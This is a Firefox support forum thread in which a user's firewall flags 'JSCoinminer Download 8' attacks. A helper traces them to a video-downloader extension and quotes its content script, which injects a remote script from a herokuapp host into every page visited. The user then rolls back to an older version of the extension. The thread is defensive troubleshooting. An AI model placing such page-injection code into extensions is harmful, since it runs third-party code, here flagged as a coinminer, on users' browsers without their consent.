Web Attacker: JSCoinminer Download 8 (Symantec Description Name)
As of today, 3/24/18, I keep getting web attacks with FIrefox on all websites visited, attacks which are being blocked by my firewall, Symantec's "Norton Security":
Intrusion type: "JSCoinminer Download 8", as per Symantec's description Attacker URL: thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics
Happens through: "C:\ Program Files (x86)\Mozilla Firefox\firefox.exe", although I use a 64-bit version of Firefox on Windows 7 (SP1), 64-bit.
Since it has "Mozilla" in the URL, does Mozilla know anything about this?
Happens on ALL websites, including, but not limited to, www.nytimes.com , www.washingtonpost.com. , support/mozilla.org/
Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2
Modified
Chosen solution
I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed.
I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL.
Thank you for your quick and helpful response in all this. It is much appreciated.
Read this answer in context 👍 1All Replies (6)
degnmozilla said
Another post suggested a Firefox add-on causing the problem, but all add-ons listed in Firefox are ones I have been using for a least a year, and originally came from the selection offered by Mozilla. Does Mozilla know if any of these have been compromised: AdBlocker Ultimate, Ghostery, HTTPS Everywhere, Video DownloadHelper, YouTube Best Video Downloader 2
Test by disabling half of them and seeing whether anything changes. If problems continue, try the other half.
Could you check for alien script files in your Firefox program folder? In particular, in these locations (varies for 32-bit / 64-bit):
- C:\Program Files\Mozilla Firefox\defaults\pref
- C:\Program Files (x86)\Mozilla Firefox\defaults\pref
Caution: Do not double-click script files! The default action for a script file it to execute as a Windows system script. (Typically this would just not work, but why risk it.)
Make sure Windows is showing hidden files: https://support.microsoft.com/en-us/help/14201/windows-show-hidden-files
A file named channel-prefs.js is normal. Any other file in this folder is suspicious. Remove any such files to a neutral location for further analysis at your leisure.
Changes here would take effect at your next startup.
By disabling "YouTube Best Video Downloader 2" the attacks stopped. Disabling the other add-ons listed above made no difference.
Right now I'm leaving "YouTube Best Video Downloader 2" disabled, and will continued to monitor whether that fixes the problem for good.
If this particular add-on is compromised, I would hope Mozilla would contact the developer about the problem. Also, if it is ever fixed, I would appreciate hearing that it is safe to use, again.
Thank you for your response above.
As to your other suggest above, only "channel-prefs.js" is located in the directory you indicated, with "hidden files" showing.
I don't know why the extension uses that "attacker URL". When I submit that script to VirusTotal, there are 3 detections out of 58, so it's not clear whether it's really dangerous or just looks suspiciously similar to something else:
It seems intended to do some kind of global logging of certain activity in pages:
/content_script/content.js:
//code to log event (function(){ var logContentEvent = document.createElement('script'); logContentEvent.src = 'https://thrillingos.herokuapp.com/mozilla/best-ytb-down/content/analytics'; document.body.appendChild(logContentEvent); })();
This content.js script seems to be new in the latest release (March 17th). The only explanation of the change is:
" improved analytics to serve better"
To serve whom better?!
If you want to use this extension, you could roll back to the March 15th release. Here's how:
(1) Disable auto-updating for this extension
On the Add-ons page, click the "More" link for the extension and scroll down to the row with the Automatic Updates line (Default On Off Check for Updates) and click Off.
This should be saved without any need to click a Save button.
(2) Go to the extension's "Versions" page and install 8.5, the immediately previous version:
https://addons.mozilla.org/firefox/addon/youtube-download-mp3-mp4-1080p/versions/
As shown in the attached screenshot, the suspicious file does not exist in the earlier version.
Or if you no longer trust this add-on developer, you could just leave it disabled or remove it.
Seçilmiş Həll
I did as you suggested, and installed and enabled the previous 8.5 version, with updates disabled. As a result, I'm NOT getting the attack messages now from my Symantec firewall like I did when the newer version of the add-on was installed.
I also posted a message about the problem on the add-on's review page, and sent a message to Mozilla through the feedback option there. Another person had also posted, in German, a warning on the review page about the attacking URL.
Thank you for your quick and helpful response in all this. It is much appreciated.
Hi, glad got things figured out. Please Mark the Answer with the Solution as Solved.